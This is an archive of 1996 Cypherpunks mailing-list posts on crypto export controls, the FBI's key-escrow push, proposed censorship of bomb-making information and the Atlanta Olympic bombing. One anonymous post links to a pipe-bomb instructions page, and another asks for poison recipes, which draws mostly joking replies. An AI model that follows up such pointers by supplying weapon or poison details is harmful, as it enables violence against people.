well, you could turn off all those things in netscape anyway...

- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMftA1RFhy5sz+bTpAQG6SwgAlvNbuuCfTSuQZQ/+JNuAMuaWb03arq9f
JWDH7VsoX23KNMkUSZlXiRxq3vDIR8clVfXx+j6Gwpy+vGZhC7YhTIcIutZEYh2z
tpjjC1ySw92gxs7Rxm8h0IGnZIT6N8Tak070/Qc8hgWIEvHqQZHkv5UjydoSTCW7
rRcVM/mvF4x1MQrgX6NK+DRf7+1uOQFLQkbBv63sIRZeRKj/5v8u126lDShT+LOO
73S6LH7wZ6AiLEB09O2ay4v3IFJbdcLgmQGItrHn8j7v5pUf/E3MMb5TI61jj7a7
vqlin7elVIX1HXLMuvhWAfkhhISuj5YDhsChoNWDWgP1R0XnjtxfRA==
=lUu/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Mon, 29 Jul 1996 03:05:34 +0800
To: cypherpunks@toad.com
Subject: Re: ALL OF YOU ARE CRIMIN
Message-ID: <TCPSMTP.16.7.28.12.33.48.2645935021.656876@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 > At 09:33 PM 7/26/96 -0700, anonymous-remailer@shell.portal.com wrote:
 >I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
 >AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
 >CAN TRACK YOU DOWN AND CLOSE THIS LIST.
 >

 Damnit Sen. Exxon!  We told you not to use the computer!! :)


 P.J.
 pjn@nworks.com



... "The future of robotics" Ä by Cy Borg and Anne Droid

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Mon, 29 Jul 1996 06:07:46 +0800
To: "Deranged Mutant" <cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <199607280458.AAA27199@unix.asb.com>
Message-ID: <v03007805ae21721e971a@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:55 PM -0700 7/27/96, Deranged Mutant wrote:
>On 27 Jul 96 at 19:21, John Young wrote:
>
>>    The Washington Post, July 27, 1996, p. A22.
>>    Speaking in Code on the Internet ... [Editorial]
>
>Some bothersome things about this editorial...
>
>[..]
>>    security of their data. They also see it as a market in
>>    which the United States maintains a comfortable lead, one
>>    that is threatened if domestic encryption makers can't sell
>>    their products elsewhere. The makers argue that foreign
>>    encryption software will rush in to fill the gap, doing
>>    nothing about the uncrackability problem -- indeed, making
>>    it worse. The administration in turn is pursuing a wider
>
>IMO, the US does not have a comfortable lead. It's already falling
>behind considering some of the stronger crypto programs available (at
>least as freeware) are made outside the US.  Many of the stronger
>algorithms were invented outside of the US (IDEA for instance).

This, and similar remarks by others, consistently misses the point which I
have been making for about a year now, and which Director Freeh finally
made explicit in his testimony last week. That is--the government is
concerned with mass market software incorporating robust crypto, used
overseas, and recognizes that they can't keep niche products off the
market, nor stop bad guys from using crypto the government would just as
soon they didn't. Since the US has a hammerlock on that mass market, and
since few would switch products to let the crypto tail wag the features dog
(no slur intended), ITAR follows.

Though I've no connection with Freeh, it's interesting that his language is
almost word for word the same as what I've been using. Do you suppose some
of his staff reads my stuff?

Until now we haven't seen such an open public admission of what the
government is concerned about--probably because the State Department
doesn't like to have an official spokesman admit we're mass monitoring and
seining foreign traffic since it is an embarassment to the polite fiction
of diplomatic relations (though I'm sure the truth is that every country
with the capability does it).


>
>[..]
>>    with wiretapping. Mr. Freeh, testifying at Thursday's hearing in
>>    favor of an optional key escrow plan, noted that the point is not
>>    to prevent all  copies of uncrackable code from going abroad --  that's
>>    clearly impossible -- but to prevent such high-level code
>>    from becoming the international standard, with architecture
>>    and transmission channels all unreadable to world
>>    authorities. To software companies and Internet users who
>
>So why should criminals bother with using standards if they are
>readable by authorities?

See above.

>
>>    have been clamoring for the right to encrypt as securely as
>>    possible, Mr. Freeh and others argue, "the genie is not yet
>>    out of the bottle" on "robust," meaning uncrackable,
>>    encryption.
>
>Are they going to magically erase all copies of strong software that
>is already currently available? (Side note: the Pacifica news report
>on Friday notes that while Freeh gave his testimony, over 100 copies
>of PGP were downloaded from MIT's site.)

What he's saying is that US-exported copies of the Lotus Lockshens,
Microsoft Machayas, and Netscape Niguns of the world still do not contain
robust crypto the USG cannot read.


>
>>    the encryption enthusiasts' desire for free development
>>    should take precedence over the tracking of terrorism. At
>
>It's not clear that terrorism can be tracked, even if it's unencrypted.
>The OK and WTC bombings were apparently not encrypted, and there's
>some allegations that the authorities had advanced warnings of the
>latter.

He says it can, and suggests following the banking trail among other
things. We know the government has already had good success with this
strategy. And one of the objectives is to identify sponsors of terrorism
and retaliate against them (cf. Netanyahu).

>
>>    the very least, Congress should be exceedingly cautious
>>    about getting out ahead of administration concerns on
>>    controls that, once lifted, are hardly reversible.
>
>The controls haven't done much to prevent free software from being
>exported.  They only control commercial sales of software (and
>hardware).

Exactly.

>
>Particularly absent in the WaPo-ed is that many do not trust the
>authorities (in the US and elsewhere)--particularly the FBI, which
>has a long history of extra-legal surveillance.

So as Netanyahu says at length we need to build in protections against
abuses, using both the legislature and the judiciary.


David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Mon, 29 Jul 1996 03:43:39 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie
Message-ID: <TCPSMTP.16.7.28.12.59.38.2645935021.656888@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> Why does it sounds like Mr. Freeh and his friends are drinking out of
 In> a different bottle than the rest of us?

     Why does it sound like they have been drinking period? <VBG>


 P.J.
 pjn@nworks.com



... He's not exactly working on all thrusters. - Mcoy

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Mon, 29 Jul 1996 03:28:52 +0800
To: cypherpunks@toad.com
Subject: cypherpunks vs hackers
Message-ID: <TCPSMTP.16.7.28.12.59.42.2645935021.656889@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> How can we differentiate cypherpunks to hackers? What are their
 In> attitudes, psychological thinking, main objective?

 It is interesting to note that while both groups have opposite
 objectives (Hackers want all information free, where cypherpunks want
 everbody to be able to have privacy), and yet in there own ways, they
 are both right.

 I think what we need to define is the diffrence between hackers and
 crackers. A hacker breaks into a computer like a cracker (but the 
 similarities end there).  The hacker just want to look and learn, 
 possably "map out" the system just to see how everything works with
 everything else.  Crackers break into computers for the sake of 
 destroying or stealing information or the system itself.

 Both cypherpunks and hackers think that the government is wrong
 in many things that they do.


 P.J.
 pjn@nworks.com


... It would seem that evil retreats when forcibly confronted. - Excalbian

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 29 Jul 1996 06:14:52 +0800
To: cypherpunks@toad.com
Subject: Re: Feinstein wants controls on Internet, Books
Message-ID: <2.2.32.19960728201109.00b00b78@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


>Return-Path: cypherpunks-errors@toad.com
>Received: from toad.com (toad.com [140.174.2.1]) by desiree.teleport.com
(8.7.5/8.7.3) with ESMTP id LAA20243; Sun, 28 Jul 1996 11:45:31 -0700 (PDT)
>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id LAA24963
for cypherpunks-outgoing; Sun, 28 Jul 1996 11:18:18 -0700 (PDT)
>Received: from slack.lne.com (slack.lne.com [140.174.94.3]) by toad.com
(8.7.5/8.7.3) with ESMTP id LAA24943 for <cypherpunks@toad.com>; Sun, 28 Jul
1996 11:18:04 -0700 (PDT)
>Received: (from ericm@localhost) by slack.lne.com (8.7.1/1.0) id LAA01221;
Sun, 28 Jul 1996 11:17:38 -0700
>From: Eric Murray <ericm@lne.com>
>Message-Id: <199607281817.LAA01221@slack.lne.com>
>Subject: Re: Feinstein wants controls on Internet, Books
>To: tcmay@got.net (Timothy C. May)
>Date: Sun, 28 Jul 1996 11:17:38 -0700 (PDT)
>Cc: cypherpunks@toad.com
>In-Reply-To: <ae20e54404021004a690@[205.199.118.202]> from "Timothy C. May"
at Jul 29, 96 02:26:17 am
>MIME-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>X-UIDL: 80129fa915fe7d4135b53b9b5e157ff7
>
>Timothy C. May writes:
>> 
>> 
>> One of my senators, Senator Dianne Feinstein, is now arguing on CNN for
>> controls on information put on the Internet, on censorship of books and
>> articles describing how pipe bombs work, and for making it easier to get
>> wiretaps against those suspected of committing thought crimes.
>> 
>> One or two more major incidents on top of the recent ones (World Trade
>> Center, Oklahoma City, Dharan, TWA 800, and Olympic Village) and I suspect
>> Congress will simply vote to repeal the Bill of Rights and just be done
>> with this whole experiment in liberty.
>
>Yes, but it won't be nearly that blatant.  In classic Orewllian
>Doublespeak, it'll be called the "Terrorist Victims Bill
>of Rights and Freedom of Information Act" and will merely
>'abridge' the Bill of Rights with the "right" of the government
>to investigate, wiretap, arrest and detain without trial
>any suspected "terrorists" and "drug kingpins".
>
>Cancelling the Bill of Rights would be too obvious, and probably
>isn't the outright goal of any but a few extremists in government.
>Rather, the majority of bureaucrats/elected officials want to
>redefine the Rights to only apply to "good citizens", for somewhat
>varying definitions of "good".  "They" won't suddenly stage a fascist
>coup, instead it will (and has been) a long step-by-step process.
>I don't think that most policy-makers are even aware
>of what they're doing (DiFi certainly isn't) they're
>just responding to preceived public pressure and trying
>to stay elected.
>
>The ugliest phrase in American lexicon: "There oughta be a law".
>
>
>
>-- 
>Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
>PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF
>
>
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 29 Jul 1996 06:03:07 +0800
To: cypherpunks@toad.com
Subject: Re: your favorite poison recipes
Message-ID: <2.2.32.19960728201127.00dc9e30@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:11 PM 7/28/96 -0700, anonymous-remailer@shell.portal.com wrote:
>Please post your favorite poison recipes to this mlist.

Why post them?  Barnes and Noble bookstore will sell you good poison recipes
in book form.  (I found mine in the bargain section.)  You can also find
them in any good book on organic chemistry or in a bookstore that
specializes in mysteries.

Or you can just go to McDonalds and ask them what is in the hamburgers...
(Of course, they will not tell you that it is made with troll meat.)


---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 29 Jul 1996 06:23:56 +0800
To: cypherpunks@toad.com
Subject: De facto martial law
Message-ID: <199607282018.NAA06170@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Assoc. Press, 28-Jul-1996

Federal investigators reported "very good leads" Sunday in
the hunt for the Olympic bomber, and the Georgia National Guard mobilized 
fresh troops to add muscle to the force protecting against a repeat attack. 

[...]

Huge crowds, including more than 80,000 at the stadium, seemed 
undeterred by tougher security screening and fears of terrorism. 
   
"The more they check us, the happier I am," Nancy Hudgins, of Stone
Mountain, Ga., said at a handball game in the Georgia Congress Center. 

[...]


The Georgia state government said it would dispatch by Monday morning 
an additional National Guard infantry battalion, the 121st from Macon, to
supplement the civilian bag-searchers, metal-detector operators and guards 
at Atlanta Olympic sites. 
   
About 4,000 guardsmen are already deployed on any one day here. The
battalion would add "a few hundred" to that contingent, government 
spokesmen said. 
   
The civilian, police and military security army on hand here totals some
30,000. The White House said Sunday about 900 FBI agents are now assigned 
to Olympic duty. 

[...]


27-Jul-1996

The Olympics turned into an armed encampment Saturday, police and 
soldiers and bomb-sniffing dogs everywhere, all athletes and fans
subject to search, the free spirit of the Summer Games suddenly gone. 
   
The bomb that killed a woman and injured more than 100 people, among the
thousands jolted at a rock concert in Centennial Olympic Park at 1:25 a.m.,
instantly transformed the Games into fields of fear. 
   
Sentries wielding machine guns and rifles guarded gates and patrolled
buildings from basements to rooftops. Officers conducted meticulous 
searches of vehicles, checking under them with extended mirrors the way a 
dentist probes for cavities. 

[...]

Security, already on high alert since the TWA Flight 800 explosion, became
more visible all over. Soldiers carrying machine guns scout[ed] the 
rowing site at Lake Lanier, in normal times a peaceful recreational 
community.


Reuters, 07/28 

Olympics-FBI search man's home in bomb hunt, paper

A man from rural north Georgia says the FBI searched his home for 
clues to the weekend bombing at Atlanta's Centennial Olympic Park, 
a newspaper reported on Sunday.
     
The Daily Citizen-News of Dalton quoted 41-year-old Terry Roper of Rocky
Face, Georgia, as saying that investigators showed up at his remote 
country home on Saturday and searched the house, the yard and his vehicles 
with bomb-sniffing dogs.

[...]
     
The federal agents left after the search, telling the man they would be in
touch, the newspaper said.
 
[...]

"I was home here all night long. I haven't been to Atlanta in a year or
so," it quoted Roper as saying. He said he knows nothing about bomb-making.

[...]
     
The newspaper said police were acting on an anonymous tip phoned into its
circulation department by an unidentified caller.
     
Roper told the newspaper he believed the call stemmed from a workplace
conversation about precautions against terrorism at Olympic venues.
     
"I never have mentioned nothing about making a bomb, blowing anything 
up or anything like that. I don't know how to make a bomb," he was quoted 
as saying.

  
07/28 
 
Olympics-Militia group condemns attack, calls it ...


An extreme rightwing Georgia militia on Sunday denied responsibility 
for an explosion at the Atlanta Olympics in which two people died, 
and a member held on previous bomb charges called it a cowardly
act.
     
J.J. Johnson, a co-founder of the "112th Regiment Militia-at-Large for the
Republic of Georgia" told a news conference they were angry over press
suggestions that they planted the pipe bomb among Olympic revellers early 
on Saturday.
     
"We categorically deny having any knowledge of this or anything to do with
this," he said.
     
"Atlanta now looks like a virtual police state, which is something the
patriots and militia have fought against. Why would we do something to bring
that about?" said Johnson, a radio talk show host who moved to Georgia from
Ohio.

[...]
     
Johnson and militia attorney Nancy Lord offered to assist the FBI by
providing investigators with names of potential bomb-makers from around the
state.
     
The names turned out to belong to informants for the federal Bureau of
Alcohol, Tobacco and Firearms (ATF) [...]

     
"They're the only people we know of in the Georgia area who like to talk
about pipe bombs, who like to build pipe bombs," said Lord [...]
     






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mallet@juno.com
Date: Mon, 29 Jul 1996 06:25:01 +0800
To: cypherpunks@toad.com
Subject: overwhelmed/overloaded
Message-ID: <19960728.134140.9231.0.mallet@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Clearly, some of us aren't exhibiting the proper sensitivity to the
feelings of others.  This can't continue.

But it will.

So, live with it.

Maybe we could have a cypherpunk nanny who exhorts niceness from a bully
pulpit, but please can we keep it to one nanny?  May it could be a
rotating honor.

Flame away, nannies.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 29 Jul 1996 06:50:48 +0800
To: cypherpunks@toad.com
Subject: Re: Feinstein wants controls on Internet, Books
Message-ID: <199607282047.NAA28494@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:26 AM 7/29/96 -0700, tcmay@got.net (Timothy C. May) wrote:
>One of my senators, Senator Dianne Feinstein, is now arguing on CNN for
>controls on information put on the Internet, on censorship of books and
>articles describing how pipe bombs work, and for making it easier to get
>wiretaps against those suspected of committing thought crimes.

Unlike many pro-censorship ideas from your Congresscritters and fedcops,
Federal courts have dealt with this one, at least for magazines.
"The Progressive" wanted to publish the plans for hydrogen bombs
a few years back, and a federal district court issued a restraining order
to prevent publication.  Another magazine published the article,
and a federal appeals court dismissed the case.  (United States v. The
Progressive, 467 F.Supp. 990 (W.D. Wis.), dismissed without opinion, 
610 F.2d 819 (7th Cir. 1979).)   Prior restraint is extremely difficult
to get away with, and when the information is already widely available,
such as simple pipe bombs, it's just not tenable.


Now, there are subtleties to building them that may require 
some amount of thought, rather than being totally obvious to the builder,
and there are things that are obvious but are difficult to do.

For instance, say you, hypothetically, wanted to blow up your government's
legislative building.  You'd obviously want to pick a dark and stormy night,
say early in November, and you'd sneak into the basement with barrels
of gunpowder.  You'd use a long, slow-burning fuse, so it would blow up
the next day when they're in session, but after lighting it you'd still
run away very fast just in case your fuse speeds up on you.  The obvious
thing you'd need to do is to NOT GET CAUGHT LIKE THE LAST FOOL WHO TRIED IT.
However, if you do get caught, maybe you'll end up with your name in lights
and people will set off firecrackers in your honor every fall,
while if you don't get caught you won't be personally famous. Tough choice:-)

Penny for the Guy?
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 29 Jul 1996 07:20:50 +0800
To: cypherpunks@toad.com
Subject: Re: Feinstein wants controls on forwards
Message-ID: <2.2.32.19960728205450.00de7e34@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:11 PM 7/28/96 -0700, Alan Olsen wrote:

Damn!  Sorry!  Forwarded it to the wrong alias in Eudora.

(I knew I was going to fuck that up one of these days...  Need more caffiene.)

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jul 1996 14:03:34 +0800
To: Jerome Tan <cypherpunks@toad.com>
Subject: Re: cypherpunks vs hackers
Message-ID: <ae203625120210041dc2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:36 PM 7/27/96, Jerome Tan wrote:
>How can we differentiate cypherpunks to hackers? What are their attitudes,
>psychological thinking, main objective?

I would differentiate cypherpunks to hackers this way:

dC/dH

Not sure what the result is, but the slope is the key.


--Tim


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 29 Jul 1996 05:12:37 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Feinstein wants controls on Internet, Books
In-Reply-To: <ae20e54404021004a690@[205.199.118.202]>
Message-ID: <199607281859.NAA24412@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> One of my senators, Senator Dianne Feinstein, is now arguing on CNN for
> controls on information put on the Internet, on censorship of books and
> articles describing how pipe bombs work, and for making it easier to get
> wiretaps against those suspected of committing thought crimes.

I just thought about this: obviously (witness the CDA which is much less
notorious than this proposition)  none of what she suggests would ever
work technically and pass the courts legally.

She may be dumb enough not to realize that BUT I think that she realizes
that too.

Therefore we can logically conclude that she does it just to score
some immediate points with angry electorate.

igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Jul 1996 07:20:46 +0800
To: cypherpunks@toad.com
Subject: Re: your favorite poison recipes
Message-ID: <199607282123.OAA06727@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:11 PM 7/28/96 -0700, anonymous-remailer@shell.portal.com wrote:
>Please post your favorite poison recipes to this mlist.


I recommend a book called "Handbook for Poisoners," by Raymond Bond.  While 
it is mostly a collection of (mostly fictional) poison stories, the forward 
is a rather extensive non-fictional summary of poisons as was commonly known 
when the book was written, in 1950 or so.  The main problem is that it 
doesn't include the various anticholinesterases then known, such as Tabun or 
Sarin.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@vegas.gateway.com (Anonymous Remail Service)
Date: Mon, 29 Jul 1996 04:33:43 +0800
To: cypherpunks@toad.com
Subject: Terrorist voice recognition
Message-ID: <199607281838.OAA12013@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone else find it odd that the tape of the 911 call, threatening the
terrorist bomb at the Olympic Park, still hasn't been released to the media?
It would seem that there is at least a possibility that someone could know
this person's voice and finger him for the feds...
I have a [disturbing, hence anonymous] explanation: The feds figure they have
already got a pool of people who can recognise the voice of a pipe-bomber, as
sworn courtroom admissions show that the previous pipebombs' burial locations,
supposedly known to "the Georgia Militia," were actually only known to a single
government informant infiltrator. [The media, for some strange reason, didn't
choose to report this little item. The militia case has now been delayed.]
Hmmmmmmmm.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Grigg <iang@systemics.com>
Date: Sun, 28 Jul 1996 22:58:38 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Schelling Points leads to interesting family investment opportunities
Message-ID: <31FB5FFA.41C67EA6@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Tim,

you said:
> The _costs_ of extending beyond the Schelling point boundaries
> is deemed to be too high, and the boundary persists.

This reminds me of the transactional theory of business units.
Working from memory, the optimal size of a business unit is
positively related to the cost of the transactions conducted
between units, other things being held constant.

Thus, in a place where it is "expensive to do business" the
dominant form of company will be large.  Conversely in a
cheap business environment, small companies will predominate.
This notion spurs one to examine the transactional costs and
to decide (or not) to lower them...

The interesting part for your family context is that falling
transaction costs have purportedly produced a shift away from
large companies to smaller units.  Those falling costs are in
the sphere of digital communications, other technology, and
regulation.  If such were to apply to the context of families,
upbringing children and education in general, one might
predict that the size of the family should shrink.

In a sense we might have already seen this.  The extended
family is really just a memory for most westerners, but is
still the norm in poor countries.  And I guess we have seen
a strong increase in the number of single-parent families
in most western countries.

One would then be lead to ask, if you are proposing that
Internet technologies in general and crypto in particular
are influences on the Schelling points related to the family
rights set, can this result in smaller family units?

That is, the cost of providing (net) education falls, and
the ease of crypto communication allows children to grow up
as individuals in the big wide Inter-world rather than the
shoolyard.

If I were permitted to ramble without judicious limit, I would
talk about the economic unit becoming a single person, and that
person becoming responsible for their own success, regardless
of their age.

In this view of the future, a child is an economic unit, and is
responsible for his own education, and thus must learn for the
future.  Obviously there is a bootstrapping problem here previously
known as birth, and this could be addressed by well-meaning
investors purchasing educational rights to a mother's future child
(in effect, buying an unborn baby).  The child then becomes the
ward of the investor, who attempts to raise the child to produce
the maximal return.

Of course, in order to eliminate the distorting effects of
love and child-like whims (I don't want to log into teacher
today), there would have to be a free market for raising rights,
based on caveat emptor examination of progress.  Thus would be
exist an informational approach to encourage the child's
attention to books, and of course, towards a successful career
as an investor in the youth of tomorrow.

This would also allow specialisation of investment, those that
concentrate on the early years, those on the teens and those
that reap the final rewards of first productive working years.
The arisal of these strata would lay to rest for ever that
old saw of the economists by showing that there is no market
failure in education, and thus no need for regulation.

And in answer to those anticipated questions from concerned
parents, no, I don't have any children, and yes, in the new
world, senior citizens can contract to investors to provide
granny services, so that they won't be unemployed.

But perhaps I should really have placed a judicious limit
on my ramblings :-)

-- 
iang
iang@systemics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Mon, 29 Jul 1996 07:52:01 +0800
To: cypherpunks@toad.com
Subject: Re: your favorite poison recipes
In-Reply-To: <199607281911.MAA02693@jobe.shell.portal.com>
Message-ID: <v03007801ae2191571db7@[17.219.103.138]>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes:

>Please post your favorite poison recipes to this mlist.

Rare roast beef, baked potato with plenty of butter, red wine.

This is an excellent poison whose only disadvantage is that it
must be taken daily for many years.

The primary advantage of this poison is that the coroner
will most assuredly list the cause of death as "heart disease."

Martin.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jul 1996 16:11:49 +0800
To: cypherpunks@toad.com
Subject: Re: Public vs. Private Munitions
Message-ID: <ae20443d130210046d5c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:36 AM 7/28/96, Erle Greer wrote:
>At 11:25 AM 7/28/96 -0700, you wrote:
>>At 7:24 PM 7/27/96, Erle Greer wrote:
>>
>>>     Theoretically, the government should only be have the resources to
>>>control commercially-available, public encryption systems.  Who is to stop
>>
>>While I'm not exactly sure what you mean by a "commercially-available,
>>public encryption system," I think your point is incorrect.
>
>I didn't mean that I think that the govt should be allowed to control.  I
>meant that govt would only be able to regulate commercial and/or public
>systems.  They, of course, would have no say in the specs of my
>personally-written cryptosystem.

Your clarification does not improve things. The notion that the "govt would
only be able to regulate commercial and/or public systems" is wrong. (There
may be a very few situations involving product safety, fraud, etc....many
of us disagree with even these interventions, of course.)

Think of it this way: "govt would only be able to regulate commercial
and/or public word processors." The government has no authority to
"regulate" word processors, commercial or otherwise.


>>(My confusion is that a commercially-available system is not necessarily a
>>"public" system, if by public one means public domain. If one means
>>"published specifications," still not the case. Confusing.)
>
>Sorry about the confusion.  Although I may have used the two terms loosely,
>I was trying to contrast commercial and public against something written in
>secret and not offered for govt approval.

The United States government does not receive software submissions "for
govt approval."

I really think you need to look into what the role of the U.S. government
actually is, with regard to programs. (It is always important to remember
that there are no laws whatsover about the types of software individuals or
businesses may use, save for some specific laws about such things as racial
discrimination, sexual harassment, taxes, etc. But no laws about crypto,
word processors, etc. And the government has no "Sofware Approval Office.")

I guess we will have to agree that we are unable to find a common basis for
communication.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 29 Jul 1996 08:17:21 +0800
To: cypherpunks@toad.com
Subject: H0W T0 MAK3 A P1P3 B0M8
Message-ID: <199607282208.PAA10748@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.infocom.net/~cbottaro/explosives.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 29 Jul 1996 08:09:28 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Feinstein wants controls on Internet, Books
Message-ID: <199607282209.PAA08400@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:45 PM 7/28/96 -0700, Bill Stewart wrote:

>For instance, say you, hypothetically, wanted to blow up your government's
>legislative building.  You'd obviously want to pick a dark and stormy night,
>say early in November, and you'd sneak into the basement with barrels
>of gunpowder.  You'd use a long, slow-burning fuse, so it would blow up
>the next day when they're in session, but after lighting it you'd still
>run away very fast just in case your fuse speeds up on you.  The obvious
>thing you'd need to do is to NOT GET CAUGHT LIKE THE LAST FOOL WHO TRIED IT.
>However, if you do get caught, maybe you'll end up with your name in lights
>and people will set off firecrackers in your honor every fall,
>while if you don't get caught you won't be personally famous. Tough choice:-)
>
>Penny for the Guy?


Fawke You!

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 29 Jul 1996 05:09:46 +0800
To: cypherpunks@toad.com
Subject: e$: The Demographic "Transaction" (was Re: Schelling Points...)
In-Reply-To: <ae20dd0b00021004b7f1@[205.199.118.202]>
Message-ID: <v03007604ae21621ea909@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:00 AM -0400 7/29/96, Timothy C. May wrote:
> Which it has, as you note. The availability of microwave dinners,
> transportation to new jobs, new employment patterns, and other factors too
> numerable to mention are correlated fairly strongly with a reduction in the
> size of the average family.

On a wild tangent to the topic at hand, this reminds me of a talk at MIT I
went to last year (?) given by an editor emeritus of SciAm, can't remember
his name at the moment, but he was introduced by Phillip Morrison, which
was memorable for its own sake.

This guy talked about something he called the "demographic transition",
where a country's per capita life expectancy went past, say, 50 or so. When
that happens, people start to breed less. (Well, maybe the keep *breeding*,
but not procreatively ;-)).

As a result, family sizes and populations decline. He said that this has
started to happen in India, and China's getting there, draconian population
controls or not. I got the impression that he thought China couldn't have
enforced their population controls without an increase in life expectancy,
